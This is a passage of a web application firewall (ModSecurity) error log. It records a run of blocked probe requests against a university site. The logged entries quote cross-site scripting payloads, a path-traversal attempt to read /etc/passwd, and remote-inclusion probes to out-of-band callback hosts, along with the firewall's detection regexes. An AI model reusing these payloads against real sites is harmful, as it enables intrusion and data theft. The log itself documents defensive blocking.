"WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAoPuagAAAAM"]
[Tue Aug 29 11:52:57.921210 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15qcCo-f0AAAoLfOYAAAAG"]
[Tue Aug 29 11:52:59.223725 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAoZ6RQAAAAK"]
[Tue Aug 29 11:53:00.692069 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAoXJtIAAAAP"]
[Tue Aug 29 11:53:00.717500 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAlUlzgAAAA0"]
[Tue Aug 29 11:53:01.576309 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAog@BYAAAAY"]
[Tue Aug 29 11:53:01.896195 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAolKSsAAAAe"]
[Tue Aug 29 11:53:02.608521 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAoqbOUAAAAj"]
[Tue Aug 29 11:53:02.738779 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAoAkv4AAAAC"]
[Tue Aug 29 11:53:04.109469 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAolKTEAAAAe"]
[Tue Aug 29 11:53:04.871243 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAoml0wAAAAf"]
[Tue Aug 29 11:53:04.952914 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAosCu8AAAAm"]
[Tue Aug 29 11:53:06.052701 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAor7ooAAAAk"]
[Tue Aug 29 11:53:07.561597 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15s8Co-f0AAAot8L4AAAAn"]
[Tue Aug 29 11:53:08.249056 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAhoHWQAAAAl"]
[Tue Aug 29 11:53:08.256733 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAnTlZkAAAAA"]
[Tue Aug 29 11:53:08.778712 2023] [:error] [pid 2589] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAodkqEAAAAS"]
[Tue Aug 29 11:53:09.572881 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tcCo-f0AAAoesLYAAAAV"]
[Tue Aug 29 11:53:10.257302 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tsCo-f0AAAoXJugAAAAP"]
[Tue Aug 29 11:53:11.801255 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15t8Co-f0AAAlUl0oAAAA0"]
[Tue Aug 29 11:53:11.925265 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15t8Co-f0AAAor7pgAAAAk"]
[Tue Aug 29 11:53:12.098572 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15uMCo-f0AAAot8MoAAAAn"]
[Tue Aug 29 11:53:12.682865 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15uMCo-f0AAAfWOVEAAAAL"]
[Tue Aug 29 11:53:14.485554 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAoAkxkAAAAC"]
[Tue Aug 29 11:53:14.633968 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAoLfRAAAAAG"]
[Tue Aug 29 11:53:15.887144 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAoW7OIAAAAJ"]
[Tue Aug 29 11:53:16.613180 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAoT7VwAAAAD"]
[Tue Aug 29 11:53:17.631318 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAoT7V8AAAAD"]
[Tue Aug 29 11:53:18.715999 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15vsCo-f0AAAowNncAAAAH"]
